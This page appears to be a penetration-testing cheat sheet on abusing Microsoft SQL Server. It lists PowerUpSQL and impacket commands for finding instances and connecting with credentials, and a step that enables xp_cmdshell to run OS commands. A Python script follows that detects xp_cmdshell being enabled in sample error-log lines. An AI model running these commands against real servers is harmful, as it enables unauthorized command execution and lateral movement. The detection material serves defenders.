
MSSQL Abuse

Tags
Authenticated, Lateral Movement, Privilege Escalation

Identify

GitHub PowerUpSQL Cheat Sheet

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

Connect - Windows

Get-SQLQuery -Verbose -Instance "host,port" -username "domain.local\\user" -password "password" -query 'Select @@version'
Local

Connect - Linux

mssqlclient.py DOMAIN/USER@IP -windows-auth

Exploit

Run commands with xp_cmdshell

SQL> enable_xp_cmdshell
xp_cmdshell whoami /priv
linux - impacket
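
Detection

Enabling xp_cmdshell, as the enable_xp_cmdshell step above does, goes through sp_configure, and SQL Server writes each configuration change to its error log. The following is an added example (not part of the original page or of any tool named on it) that flags those entries and reports how long xp_cmdshell stayed enabled. The log lines are constructed samples in ERRORLOG layout, and the function names are hypothetical.

```python
import re

# Constructed sample lines in SQL Server ERRORLOG layout (not from a real host).
SAMPLE_ERRORLOG = """\
2024-03-02 09:14:07.31 spid61      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:14:07.35 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:20:44.02 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-03-02 10:01:12.90 spid12s     Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Options whose activation allows OS command execution, or is a prerequisite for it.
WATCHED = {"xp_cmdshell": "high", "show advanced options": "info"}

def find_config_changes(text):
    """Return one finding per watched sp_configure change in the log text."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["option"] not in WATCHED:
            continue
        enabled = m["old"] == "0" and m["new"] != "0"
        findings.append({
            "time": m["ts"], "spid": m["spid"], "option": m["option"],
            "action": "enabled" if enabled else "disabled",
            "severity": WATCHED[m["option"]] if enabled else "info",
        })
    return findings

def xp_cmdshell_exposure_windows(findings):
    """Pair each xp_cmdshell enable with the next disable: (start, end or None)."""
    windows, start = [], None
    for f in findings:
        if f["option"] != "xp_cmdshell":
            continue
        if f["action"] == "enabled" and start is None:
            start = f["time"]
        elif f["action"] == "disabled" and start is not None:
            windows.append((start, f["time"]))
            start = None
    if start is not None:
        windows.append((start, None))  # still enabled at end of log
    return windows

if __name__ == "__main__":
    print(xp_cmdshell_exposure_windows(find_config_changes(SAMPLE_ERRORLOG)))
```

ERRORLOG files on disk are usually UTF-16 encoded, so decode them before passing the text in. A window whose end is None means xp_cmdshell was never switched back off within the log.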